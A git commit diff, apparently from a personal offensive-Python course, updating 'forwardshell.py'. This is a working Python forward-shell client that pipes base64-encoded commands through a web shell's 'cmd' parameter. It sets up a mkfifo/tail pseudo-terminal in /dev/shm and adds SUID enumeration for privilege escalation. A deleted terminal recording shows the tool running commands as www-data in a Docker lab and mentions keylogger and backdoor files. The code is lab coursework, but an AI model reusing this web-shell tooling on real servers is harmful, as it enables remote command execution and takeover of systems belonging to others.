Compare commits

...

2 Commits

Author SHA1 Message Date
d7252c6782 Update forwardshell script 2024-02-03 12:28:27 +01:00
d4c5d8a50f wip 2024-02-03 12:27:47 +01:00
3 changed files with 154 additions and 190 deletions

View File

@ -11,41 +11,145 @@ mkfifo input; tail -f input | /bin/sh 2>&1 > output
"""
import requests
import signal
import sys
import time
from termcolor import colored
from base64 import b64encode
def def_handler(sig, frame):
print(colored("\n[!] Exiting...", "blue"))
sys.exit(1)
from random import randrange
signal.signal(signal.SIGINT, def_handler)
class ForwardShell:
main_url = "http://localhost/index.php"
def __init__(self):
session = randrange(100000, 999999)
self.main_url = "http://localhost/index.php"
self.stdin = f"/dev/shm/{session}.input"
self.stdout = f"/dev/shm/{session}.output"
self.help_options = {
'enum suid': 'FileSystem SUID Privileges Enumeration',
'help': 'Show this help panel',
}
self.is_pseudo_terminal = False
def run_command(self, command):
command = b64encode(command.encode()).decode()
data = {
'cmd': 'echo "%s" | base64 -d | /bin/sh' % command
}
try:
r = requests.get(self.main_url, params=data, timeout=5)
return r.text
except:
pass
return None
def write_stdin(self, command):
command = b64encode(command.encode()).decode()
data = {
'cmd': 'echo "%s" | base64 -d > %s' % (command, self.stdin)
}
r = requests.get(self.main_url, params=data)
def read_stdout(self):
for _ in range(5):
read_stdout_command = f"/bin/cat {self.stdout}"
output_command = self.run_command(read_stdout_command)
time.sleep(0.2)
return output_command
def setup_shell(self):
command = f"mkfifo {self.stdin}; tail -f {self.stdin} | /bin/sh 2>&1 > {self.stdout}"
self.run_command(command)
def remove_data(self):
remove_data_command = f"/bin/rm {self.stdin} {self.stdout}"
self.run_command(remove_data_command)
def clear_stdout(self):
clear_stdout_command = f"echo '' > {self.stdout}"
self.run_command(clear_stdout_command)
def run(self) -> None:
self.setup_shell()
while True:
command = input(colored("> ", "yellow"))
if "script /dev/null -c bash" in command:
print(
colored("[+] Se ha iniciado una pseudo-terminal", "blue"))
self.is_pseudo_terminal = True
def run_command(command):
if command.strip() == "enum suid":
command = b64encode(command.encode()).decode()
command = f"find / -perm -4000 2>/dev/null | xargs ls -l"
data = {
'cmd': 'echo "%s" | base64 -d | /bin/sh' % command
}
if command.strip() == "help":
r = requests.get(main_url, params=data)
print(colored(f"\n[+] Listando panel de ayuda:\n", "blue"))
return r.text
for key, value in self.help_options.items():
print(f"\t{key} - {value}")
continue
self.write_stdin(command + "\n")
output_command = self.read_stdout()
if command.strip() == "exit":
self.is_pseudo_terminal = False
print(colored("[+] Se ha cerrado la pseudo-terminal", "blue"))
self.clear_stdout()
continue
if __name__ == '__main__':
if self.is_pseudo_terminal:
lines = output_command.split("\n")
while True:
if len(lines) == 1:
command = input(colored("> ", "yellow"))
output_command = run_command(command)
cleared_output = '\n'.join([lines[-1]] + lines[:1])
print(output_command)
elif len(lines) > 1:
cleared_output = '\n'.join(
[lines[-1]] + lines[:1] + lines[2:-1])
else:
print(len(lines))
print(lines)
print(cleared_output + "\n")
else:
print(output_command)
self.clear_stdout()

View File

@ -0,0 +1,29 @@
#!/usr/bin/env python3
"""
Fichero principal de la aplicación.
"""
import signal
import sys
from forwardshell import ForwardShell
from termcolor import colored
def def_handler(sig, frame) -> None:
print(colored("\n[!] Exiting...", "blue"))
my_forward_shell.remove_data()
sys.exit(1)
signal.signal(signal.SIGINT, def_handler)
if __name__ == '__main__':
my_forward_shell = ForwardShell()
my_forward_shell.run()

View File

@ -1,169 +0,0 @@
Script started on 2024-02-02 18:20:04+01:00 [TERM="xterm-256color" TTY="/dev/pts/1" COLUMNS="106" LINES="53"]
 
7🐧 ~/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs at ⚡ 18:20:04
 [?2004h[?25l8]2;v@victus:~/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs]1;..hacking/12_fs]7;file://victus/home/v/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs\%  
🐧 ~/Doc/p/gi/p/curso-python/python-ofensivo/15_hacking/12_fs on ☕ main ?1  🔒 ES at ⚡ 18:20:04
 [?1h=[?25h[?2004h[?25l 
🐧 ~/Doc/p/gi/p/curso-python/python-ofensivo/15_hacking/12_fs on ☕ main ?1  🔒 ES vpn at ⚡ 18:20:04
 🏠 192.168.1.115[?25h[?25l 
🐧 ~/Doc/p/gi/p/curso-python/python-ofensivo/15_hacking/12_fs on ☕ main ?1  🔒 ES vpn at ⚡ 18:20:04
 🏠 192.168.1.115 📡 192.145.39.55[?25hscriptscript/[?1l>[?25l[?2004l  script/[?25h
]2;script/]1;script/% ]2;v@victus:~/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script]1;../12_fs/script]7;file://victus/home/v/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script\ 
🐧 ~/Doc/p/gi/p/curso-python/python-o/15_hacking/12_fs/script on ☕ main ?1  🔒 ES vpn at ⚡ 18:20:09
 🏠 192.168.1.115 📡 192.145.39.55[?1h=[?2004h##!#!//uussrr//bbiinn//eennvv  ppyytthhoonn3[?1l>[?25l[?2004l  #!/usr/bin/env python3[?25h
% ]2;v@victus:~/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script]1;../12_fs/script]7;file://victus/home/v/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script\ 
🐧 ~/Doc/p/gi/p/curso-python/python-o/15_hacking/12_fs/script on ☕ main ?1  🔒 ES vpn at ⚡ 18:20:30
 🏠 192.168.1.115 📡 192.145.39.55[?1h=[?2004hccurl -s -X GET 'http://localhost/' -G --data-urlencode 'cmd=cat /etc/resolv.conf 2>&1'co🏠 192.168.1.115 📡 192.145.39.55de index.htmlcoddd           d e index.htmlcode f         irmaMail-Prefapp.htmlo                    rwat rdshell.py[?1l>[?25l[?2004l  code forwardshell.py[?25h
]2;code forwardshell.py]1;code% ]2;v@victus:~/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script]1;../12_fs/script]7;file://victus/home/v/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script\ 
🐧 ~/Doc/p/gi/p/curso-python/python-o/15_hacking/12_fs/script on ☕ main ?1  🔒 ES vpn at ⚡ 18:20:44
 🏠 192.168.1.115 📡 192.145.39.55[?1h=[?2004hppyinstaller --noconsole --onefile backdoor.pypy                                           listener.pyf          irefox_decrypt.pyfo                orrwardshell.py  [?1l>[?25l[?2004l  py forwardshell.py[?25h
]2;python3 forwardshell.py]1;pywww-data
% ]2;v@victus:~/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script]1;../12_fs/script]7;file://victus/home/v/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script\ 
🐧 ~/Doc/p/gi/p/curso-python/python-o/15_hacking/12_fs/script on ☕ main ?1  🔒 ES vpn at ⚡ 18:23:42
 🏠 192.168.1.115 📡 192.145.39.55[?1h=[?2004hpy forwardshell.py[?1l>[?25l[?2004l  py forwardshell.py[?25h
]2;python3 forwardshell.py]1;py> cat
/
^CTraceback (most recent call last):
File "/home/v/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script/forwardshell.py", line 23, in <module>
output_command = run_command(command)
File "/home/v/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script/forwardshell.py", line 14, in run_command
r = requests.get(main_url, params=data)
File "/home/v/.local/lib/python3.10/site-packages/requests/api.py", line 73, in get
return request("get", url, params=params, **kwargs)
File "/home/v/.local/lib/python3.10/site-packages/requests/api.py", line 59, in request
return session.request(method=method, url=url, **kwargs)
File "/home/v/.local/lib/python3.10/site-packages/requests/sessions.py", line 587, in request
resp = self.send(prep, **send_kwargs)
File "/home/v/.local/lib/python3.10/site-packages/requests/sessions.py", line 701, in send
r = adapter.send(request, **kwargs)
File "/home/v/.local/lib/python3.10/site-packages/requests/adapters.py", line 489, in send
resp = conn.urlopen(
File "/usr/lib/python3/dist-packages/urllib3/connectionpool.py", line 700, in urlopen
httplib_response = self._make_request(
File "/usr/lib/python3/dist-packages/urllib3/connectionpool.py", line 446, in _make_request
six.raise_from(e, None)
File "<string>", line 3, in raise_from
File "/usr/lib/python3/dist-packages/urllib3/connectionpool.py", line 441, in _make_request
httplib_response = conn.getresponse()
File "/usr/lib/python3.10/http/client.py", line 1375, in getresponse
response.begin()
File "/usr/lib/python3.10/http/client.py", line 318, in begin
version, status, reason = self._read_status()
File "/usr/lib/python3.10/http/client.py", line 279, in _read_status
line = str(self.fp.readline(_MAXLINE + 1), "iso-8859-1")
File "/usr/lib/python3.10/socket.py", line 705, in readinto
return self._sock.recv_into(b)
KeyboardInterrupt
% ]2;v@victus:~/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script]1;../12_fs/script]7;file://victus/home/v/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script\ 
🐧 ~/Doc/p/gi/p/curso-python/python-o/15/12/script on ☕ main ?1
 🏠 192.168.1.115 📡 192.145.39.55[?1h=[?2004hpy forwardshell.py[?1l>[?25l[?2004l  py forwardshell.py[?25h
]2;python3 forwardshell.py]1;py> whoami
www-data
> cat /etc/hosts
127.0.0.1 localhost
::1 localhost ip6-localhost ip6-loopback
fe00::0 ip6-localnet
ff00::0 ip6-mcastprefix
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
172.17.0.2 2f2f81768a05
> pwd
/var/www/html
> ^C
[!] Exiting...
% ]2;v@victus:~/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script]1;../12_fs/script]7;file://victus/home/v/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script\ 
🐧 ~/Doc/p/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script on ☕ main ?1 took 7m 18s 🔒 ES vpn at ⚡ 18:34:09
 🏠 192.168.1.112 📡 192.145.39.55[?1h=[?2004h[?25l 
🐧 ~/Doc/p/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script on ☕ main ?1 took 7m 18s 🔒 ES vpn at ⚡ 18:34:09
 🏠 192.168.1.112 📡 192.145.39.54[?25hpy forwardshell.py[?1l>[?25l[?2004l  py forwardshell.py[?25h
]2;python3 forwardshell.py]1;py> exit
> exit
> ^C
[!] Exiting...
% ]2;v@victus:~/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script]1;../12_fs/script]7;file://victus/home/v/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script\ 
🐧 ~/Doc/p/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script on ☕ main ?1 took 6s 🔒 ES vpn at ⚡ 18:35:25
 🏠 192.168.1.112 📡 192.145.39.54[?1h=[?2004hpy forwardshell.py[?1l>[?25l[?2004l  py forwardshell.py[?25h
]2;python3 forwardshell.py]1;py> exit
> exit
> ^C
[!] Exiting...
% ]2;v@victus:~/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script]1;../12_fs/script]7;file://victus/home/v/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script\ 
🐧 ~/Doc/p/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script on ☕ main ?1 took 10s 🔒 ES vpn at ⚡ 18:36:02
 🏠 192.168.1.112 📡 192.145.39.54[?1h=[?2004hpy forwardshell.py[?1l>[?25l[?2004l  py forwardshell.py[?25h
]2;python3 forwardshell.py]1;py> exit
> ls
index.php
> e ^C
[!] Exiting...
% ]2;v@victus:~/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script]1;../12_fs/script]7;file://victus/home/v/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script\ 
🐧 ~/Doc/p/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script on ☕ main ?1 took 10s 🔒 ES vpn at ⚡ 18:36:36
 🏠 192.168.1.112 📡 192.145.39.54[?1h=[?2004hppy forwardshell.pyph                php --interactive[?1l>[?25l[?2004l  php --interactive[?25h
]2;php --interactive]1;phpzsh: command not found: php
% ]2;v@victus:~/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script]1;../12_fs/script]7;file://victus/home/v/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script\ 
🐧 ~/Doc/p/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script on ☕ main ?1  🔒 ES vpn at ⚡ 18:36:56
 🏠 192.168.1.112 📡 192.145.39.54[?1h=[?2004hdd exec -it 2f2 bashdo                 cker portdocckkedocker e   xec -it 0fc1 shxec -it 0fc1 sh[?1l>[?25l[?2004l  docker exec -it 0fc1 sh[?25h
]2;docker exec -it 0fc1 sh]1;dockerError response from daemon: No such container: 0fc1
% ]2;v@victus:~/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script]1;../12_fs/script]7;file://victus/home/v/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script\ 
🐧 ~/Doc/p/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script on ☕ main ?1  🔒 ES vpn at ⚡ 18:37:09
 🏠 192.168.1.112 📡 192.145.39.54[?1h=[?2004hddocker exec -it 0fc1 shd                      exec -it 2f2 bashexec -it 2f2 bash[?1l>[?25l[?2004l  d exec -it 2f2 bash[?25h
]2;docker exec -it 2f2 bash]1;droot@2f2f81768a05:/var/www/html# php --version
PHP 7.0.33 (cli) (built: Dec 29 2018 06:50:58) ( NTS )
Copyright (c) 1997-2017 The PHP Group
Zend Engine v3.0.0, Copyright (c) 1998-2017 Zend Technologies
root@2f2f81768a05:/var/www/html# php --interactive
Interactive shell
php > exit
root@2f2f81768a05:/var/www/html# e exit
exit
% ]2;v@victus:~/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script]1;../12_fs/script]7;file://victus/home/v/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script\ 
🐧 ~/Doc/p/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script on ☕ main ?1 took 1m 55s 🔒 ES vpn at ⚡ 18:39:09
 🏠 192.168.1.112 📡 192.145.39.54[?1h=[?2004hmmkdir scriptmkmkddimkdir c     atch-all/01_scripts_descifrador_wargame.pyi                                         bnc    atch-all/01_scripts_descifrador_wargame.pyo                                         mandos-peladon            cepto[?1l>[?25l[?2004l  mkdir concepto[?25h
]2;mkdir concepto]1;mkdir% ]2;v@victus:~/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script]1;../12_fs/script]7;file://victus/home/v/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script\ 
🐧 ~/Doc/p/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script on ☕ main ?1  🔒 ES vpn at ⚡ 18:39:33
 🏠 192.168.1.112 📡 192.145.39.54[?1h=[?2004hllsls[?1l>[?25l[?2004l  ls[?25h
]2;ls --color=tty]1;lsconcepto forwardshell.py
% ]2;v@victus:~/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script]1;../12_fs/script]7;file://victus/home/v/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script\ 
🐧 ~/Doc/p/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script on ☕ main ?1  🔒 ES vpn at ⚡ 18:39:33
 🏠 192.168.1.112 📡 192.145.39.54[?1h=[?2004hccode forwardshell.pycocon                 catenadas="hola $kease"ncce                     epconcepto/o [?1l>[?25l[?2004l  concepto[?25h
]2;concepto]1;concepto% ]2;v@victus:~/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script/concepto]1;..ript/concepto]7;file://victus/home/v/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script/concepto\ 
🐧 ~/Doc/p/gi/p/curso-python/python-ofensivo/15_hacking/12_fs/script/concepto on ☕ main ?1  🔒 ES vpn at ⚡ 18:39:36
 🏠 192.168.1.112 📡 192.145.39.54[?1h=[?2004hmmkdir conceptomkmkf           ifo --helpfiifmkfifo i     npyt;    ut;t  ttaaitail -f inop  put | //bbi/binn//bin/s/bin/sh 22>>&1 Z > ouputtput[?1l>[?25l[?2004l  mkfifo input; tail -f input | /bin/sh 2>&1 > output[?25h
]2;mkfifo input; tail -f input | /bin/sh 2>&1 > output]1;mkfifo^C
% ]2;v@victus:~/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script/concepto]1;..ript/concepto]7;file://victus/home/v/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script/concepto\ 
🐧 ~/Doc/p/gi/p/curso-python/python-ofensivo/15_hacking/12_fs/script/concepto on ☕ main ?1 х INT took 7m 34s 🔒 ES vpn at ⚡ 18:48:03
 🏠 192.168.1.112 📡 192.145.39.54[?1h=[?2004hcconceptoca      t ../09_keylogger/.env | pbcopycat o                            utput.pcap | wc -louutput              [?1l>[?25l[?2004l  cat output[?25h
]2;cat output]1;catv
/home/v/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script/concepto
/home/v
% ]2;v@victus:~/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script/concepto]1;..ript/concepto]7;file://victus/home/v/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script/concepto\ 
🐧 ~/Doc/p/gi/p/curso-python/python-ofensivo/15_hacking/12_fs/script/concepto on ☕ main ?1  🔒 ES vpn at ⚡ 18:48:11
 🏠 192.168.1.112 📡 192.145.39.54[?1h=[?2004hcat outputls       cat outputecho "whoami" > inputcat output         ls       cat outputecho "pwd" > inputcat output       ls       cat outputecho "whoami" > inputcat output         ls       cat outputls       cat output         mmkfifo input; tail -f input | /bin/sh 2>&1 > outputmkmkd                                                ir conceptomk            fifo input; tail -f input | /bin/sh 2>&1 > outputmkfmkfifo input; tail -f input | /bin/sh 2>&1 > output[?1l>[?25l[?2004l  mkfifo input; tail -f input | /bin/sh 2>&1 > output[?25h
]2;mkfifo input; tail -f input | /bin/sh 2>&1 > output]1;mkfifomkfifo: no sha pogut crear la cua FIFO 'input': El fitxer ja existeix
/bin/sh: 5: probando: not found
^C
Session terminated, killing shell...
% ]2;v@victus:~/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script/concepto]1;..ript/concepto]7;file://victus/home/v/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script/concepto\ 
🐧 ~/Doc/p/gi/p/curso-python/python-ofensivo/15_hacking/12_fs/script/concepto on ☕ main ?1 х INT took 4m 51s 🔒 ES vpn at ⚡ 18:53:13
 🏠 192.168.1.112 📡 192.145.39.54[?1h=[?2004h ...killed.
[?25l  [?25h[?2004l
% ]2;v@victus:~/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script/concepto]1;..ript/concepto]7;file://victus/home/v/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script/concepto\ 
🐧 ❌ ~/Doc/p/gi/p/curso-python/python-ofensivo/15_hacking/12_fs/script/concepto х INT 🔒 ES vpn at ⚡ 22:59:38
 🏠 192.168.1.112 📡 192.145.39.54[?1h=[?2004h 
🐧 ❌ ~/Doc/p/gi/p/curso-python/python-ofensivo/15_hacking/12_fs/script/concepto х INT 🔒 ES vpn at ⚡ 22:59:38
 🏠 192.168.1.112 📡 192.145.39.54eecho "whoami" > inputex                   itexiexit[?1l>[?25l[?2004l  exit[?25h
]2;exit]1;exit
Script done on 2024-02-02 23:00:00+01:00 [COMMAND_EXIT_CODE="130"]